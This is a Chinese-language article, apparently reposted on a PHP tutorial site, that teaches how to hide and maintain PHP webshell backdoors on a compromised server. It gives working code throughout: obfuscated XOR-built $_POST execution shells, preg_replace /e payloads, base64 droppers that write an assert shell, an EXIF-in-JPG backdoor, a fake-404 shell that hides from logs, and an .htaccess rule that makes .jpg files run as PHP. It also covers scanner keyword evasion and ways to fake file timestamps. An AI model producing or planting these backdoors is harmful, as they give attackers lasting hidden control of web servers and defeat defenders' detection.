搜索
首页php教程php手册PHP后门隐藏与维持技巧,php后门技巧

PHP后门隐藏与维持技巧,php后门技巧

在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普。

AD:

0×00前言

在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普.

  • eval($_POST['cmd']);?> 
  • 或这样

    1. $_POST['cmd']);?> 

    当然,这仅是调用的函数不同,关于PHP禁用的函数请在php.ini: disable_functions 中寻找.

    但是运维直观寻找我们shell的方式也有很多,如

    ◆通过文件名/修改时间/大小,文件备份比对发现异常

    ◆通过WEBSHELL后门扫描脚本发现,如Scanbackdoor.php/Pecker/shelldetect.php以及各种扫描器等等

    ◆通过Access.log访问日志发现后门所在

    ◆又或者,我们的测试一句话还要被WAF拦一下,再来个警告日志,等等

    针对常见的检测方式,总结以下七常用手法对shell进行隐藏

    0×01规避

    看看各种扫描后门的代码就知道,留一个众人皆知,人人喊打的关键词在shell中是万万不能的

    常见的关键词如:

    ◆系统命令执行: system, passthru, shell_exec, exec, popen, proc_open

    ◆代码执行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

    ◆文件包含: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

    过去有朋友机智的使用$_POST[0]($_POST[1])来执行命令,可惜现在也难逃扫描器法眼,但万象变化,构造方法是无穷的

    tudouya 同学在FREEBUF上给出[一种构造技巧](http://www.freebuf.com/articles/web/33824.html)利用

    1. @$_++; // $_ = 1  
    2. $__=("#"^"|"); // $__ = _  
    3. $__.=("."^"~"); // _P  
    4. $__.=("/"^"`"); // _PO  
    5. $__.=("|"^"/"); // _POS  
    6. $__.=("{"^"/"); // _POST  
    7. ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);  
    8. ?> 

    构造生成,当然,嫌太直观可以写作这样

    1. $_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);?> 

    然后再填充些普通代码进行伪装,一个简单的”免杀”shell样本就出现了

    执行无误,且绕过普通扫描器,也可依赖之写新的临时shell

     

    0×02特性

    借助语法特性执行命令亦不失为有趣的手法.借用php在处理变量时的语法特性,会分析双引号中的数据是否含有变量(并解析其值)

    eg.:

    1. ${@eval(phpinfo())} 

    {}可解析双引号内的变量内容,@保持出错后继续执行

    然后就可以大摇大摆的开始构造隐藏后门了,但此处构造欲再借力于函数引起的命令执行,没错,就是preg_replace

    1. "//e",$_POST['cmd'],"");?> 

    这玩法显然已经进了扫描器黑名单,简单修改下

    1. function funfunc($str){}  
    2. echo preg_replace("/(.+?)/ies", <span class="string">'funfunc("\1")', <span class="vars">$_POST[<span class="string">"cmd"]);  </span></span></span>
    3. ?> 

    执行了,没有被发现

    执行的方式显而易见,正则匹配后的{${phpinfo()}}传入funfunc时引起了代码执行

    1. funfunc("{${phpinfo()}}") 

    另一种方法

    1. "\$arr=\"".$_GET['cmd']."\";");?> 

    0×03包含

    文件包含是众人都玩过的方法,只是包含也有技巧

    普通文件包含可能仅仅是一个include包含某个txt或jpg,甚至直接留一个包含漏洞,但扫描器也容易发现,多出的包含文件也易被发现

    看此脚本

    1.     if(@isset($_GET[content]))  
    2.     {  
    3.     $fp=fopen('README','w');  
    4.     file_put_contents('README',"
    5.     @file_put_contents('README',$_GET[content],FILE_APPEND);  
    6.     fclose($fp);  
    7.     require 'README';}  
    8. ?> 

    算是解决了一点问题,需求的shell可随用随生成,进而包含之

    可惜由于file_put_contents等函数过于敏感,也是很容易被扫描发现

    编码生成的方式创建shell,随访问而生成.

    1. fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));  
    2. ?> 

    可以逃避一些扫描器,但这个模式也比较引人注目,生成的新文件也要做简单的隐藏以躲过查杀.

    当然对于启发式之类的新概念就不考虑了

    在这种方式也满足不了需求的情况下,机智的攻击者又重拾图片

    1. $exif=exif_read_data('./lol.jpg');preg_replace($exif['Make'],$exif['Model'],'');?> 

    参考:一种隐藏在JPG图片EXIF中的后门

    这次不必再简单的copy /b生成图片马了,借用preg_replace执行文件的特定标志一样可行

    此处可能会提示 Call to undefined function exif_read_data()

    需要修改php.ini, extension=php_exif.dll

    将其加载顺序改为extension=php_mbstring.dll的后面

    可以看出,此图片后门借助了preg_replace \e参数,依赖了php的变量解析执行,又使用了base64编码,最后依赖文件标识将一个完整的shell拼合,算是给初涉后门隐藏的童鞋一个小提醒

    当然,只要有包含点,包含文件的形式是多样的,甚至于包含error_log(虽然可能要考虑闭合),只有想不到…

    0×04隐匿

    为了不让访问者发现后门的存在,机智的安全研究员也会混淆视听故弄玄虚

    1. nbsp;HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">  
    2.       
    3.     404 Not Found  
    4.       
    5.       
    6.     

      Not Found

       
    7.     

      The requested URL was not found on this server.

       
    8.       
    9.       
    10.     @preg_replace("/[checksql]/e",$_POST['cmd'],"saft");  
    11. ?> 

    借助上面的html渲染后,浏览页面已经开始伪装404以迷惑视听了

    但躲得过访问者也躲不过日志分析,为更好的隐藏在大量日志中,构造如下脚本

    1.     header('HTTP/1.1 404');  
    2.     ob_start();  
    3.     @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));  
    4.     ob_end_clean();  
    5. ?>  

    访问之,是真正的404,没错,日志中也是这样

    但此刻当前目录已生成我们要连接的脚本

    0×05混淆

    用过weevely工具的童鞋应该知道,其生成的免杀shell像这样

    1.     $penh="sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30=";  
    2.     $kthe="JGEpPjgiMpeyRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";  
    3.     $ftdf = str_replace("w","","stwrw_wrwepwlwawcwe");  
    4.     $wmmi="X3JlcgiGxhY2UgioYXgiJyYXkoJy9bXlx3PVgixzXS8nLCgicvXHMvJyksIGFycmF5KCcnLCcrgiJyk";  
    5.     $zrmt="JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo";  
    6.     $smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");  
    7.     $jgfi = $ftdf("l","","lclrlelaltel_functlilon");  
    8.     $rdwm = $jgfi('', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.$penh))); $rdwm();  
    9. ?> 

    终端下连接后像这样

    Ps:截图忘记修改终端编码了:(

    其免杀方式在于,在固定区域生成随机名称变量,后借助str_replace拼合base64_decode,执行命令的过程

    当然,这是在代码层面混淆视听以躲过扫描器

    更常用的混淆视听的方法:

    ◆修改文件时间

    ◆改名融入上传后所在文件夹,让人无法直观看出文件异常

    ◆文件大小的伪装处理(至少看起大小像个正常脚本)

    ◆选好藏身路径并尽量少的访问

    ◆畸形目录%20

    关于空格目录,还是相对容易被发现的

    0×06解析

    利用.htaccess,添加解析后门

    如:

    1. AddType   application/x-httpd-php     .jpg 

    以上以weeverly为例

    0×07杂糅

    总结以上方法,大部分无非是一个构造漏洞的过程,漏洞构造的代码能有多奇葩,后门就可以多奇葩.可以写纤细婉约的,也可以搞简单粗暴的,只是适用场 合不同而已.如能很好的融合思路,构造自己的隐藏shell想来亦非难事.以上仅为总结经验之谈,各位有有趣的想法还望不吝赐教.

    声明
    本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
    php怎么把负数转为正整数php怎么把负数转为正整数Apr 19, 2022 pm 08:59 PM

    php把负数转为正整数的方法:1、使用abs()函数将负数转为正数,使用intval()函数对正数取整,转为正整数,语法“intval(abs($number))”;2、利用“~”位运算符将负数取反加一,语法“~$number + 1”。

    php怎么实现几秒后执行一个函数php怎么实现几秒后执行一个函数Apr 24, 2022 pm 01:12 PM

    实现方法:1、使用“sleep(延迟秒数)”语句,可延迟执行函数若干秒;2、使用“time_nanosleep(延迟秒数,延迟纳秒数)”语句,可延迟执行函数若干秒和纳秒;3、使用“time_sleep_until(time()+7)”语句。

    php怎么除以100保留两位小数php怎么除以100保留两位小数Apr 22, 2022 pm 06:23 PM

    php除以100保留两位小数的方法:1、利用“/”运算符进行除法运算,语法“数值 / 100”;2、使用“number_format(除法结果, 2)”或“sprintf("%.2f",除法结果)”语句进行四舍五入的处理值,并保留两位小数。

    php怎么根据年月日判断是一年的第几天php怎么根据年月日判断是一年的第几天Apr 22, 2022 pm 05:02 PM

    判断方法:1、使用“strtotime("年-月-日")”语句将给定的年月日转换为时间戳格式;2、用“date("z",时间戳)+1”语句计算指定时间戳是一年的第几天。date()返回的天数是从0开始计算的,因此真实天数需要在此基础上加1。

    php怎么替换nbsp空格符php怎么替换nbsp空格符Apr 24, 2022 pm 02:55 PM

    方法:1、用“str_replace("&nbsp;","其他字符",$str)”语句,可将nbsp符替换为其他字符;2、用“preg_replace("/(\s|\&nbsp\;||\xc2\xa0)/","其他字符",$str)”语句。

    php怎么判断有没有小数点php怎么判断有没有小数点Apr 20, 2022 pm 08:12 PM

    php判断有没有小数点的方法:1、使用“strpos(数字字符串,'.')”语法,如果返回小数点在字符串中第一次出现的位置,则有小数点;2、使用“strrpos(数字字符串,'.')”语句,如果返回小数点在字符串中最后一次出现的位置,则有。

    php字符串有没有下标php字符串有没有下标Apr 24, 2022 am 11:49 AM

    php字符串有下标。在PHP中,下标不仅可以应用于数组和对象,还可应用于字符串,利用字符串的下标和中括号“[]”可以访问指定索引位置的字符,并对该字符进行读写,语法“字符串名[下标值]”;字符串的下标值(索引值)只能是整数类型,起始值为0。

    php怎么读取字符串后几个字符php怎么读取字符串后几个字符Apr 22, 2022 pm 08:31 PM

    在php中,可以使用substr()函数来读取字符串后几个字符,只需要将该函数的第二个参数设置为负值,第三个参数省略即可;语法为“substr(字符串,-n)”,表示读取从字符串结尾处向前数第n个字符开始,直到字符串结尾的全部字符。

    See all articles

    热AI工具

    Undresser.AI Undress

    Undresser.AI Undress

    人工智能驱动的应用程序,用于创建逼真的裸体照片

    AI Clothes Remover

    AI Clothes Remover

    用于从照片中去除衣服的在线人工智能工具。

    Undress AI Tool

    Undress AI Tool

    免费脱衣服图片

    Clothoff.io

    Clothoff.io

    AI脱衣机

    AI Hentai Generator

    AI Hentai Generator

    免费生成ai无尽的。

    热门文章

    R.E.P.O.能量晶体解释及其做什么(黄色晶体)
    2 周前By尊渡假赌尊渡假赌尊渡假赌
    仓库:如何复兴队友
    4 周前By尊渡假赌尊渡假赌尊渡假赌
    Hello Kitty Island冒险:如何获得巨型种子
    4 周前By尊渡假赌尊渡假赌尊渡假赌

    热工具

    SublimeText3 Mac版

    SublimeText3 Mac版

    神级代码编辑软件(SublimeText3)

    mPDF

    mPDF

    mPDF是一个PHP库,可以从UTF-8编码的HTML生成PDF文件。原作者Ian Back编写mPDF以从他的网站上“即时”输出PDF文件,并处理不同的语言。与原始脚本如HTML2FPDF相比,它的速度较慢,并且在使用Unicode字体时生成的文件较大,但支持CSS样式等,并进行了大量增强。支持几乎所有语言,包括RTL(阿拉伯语和希伯来语)和CJK(中日韩)。支持嵌套的块级元素(如P、DIV),

    SublimeText3汉化版

    SublimeText3汉化版

    中文版,非常好用

    EditPlus 中文破解版

    EditPlus 中文破解版

    体积小,语法高亮,不支持代码提示功能

    VSCode Windows 64位 下载

    VSCode Windows 64位 下载

    微软推出的免费、功能强大的一款IDE编辑器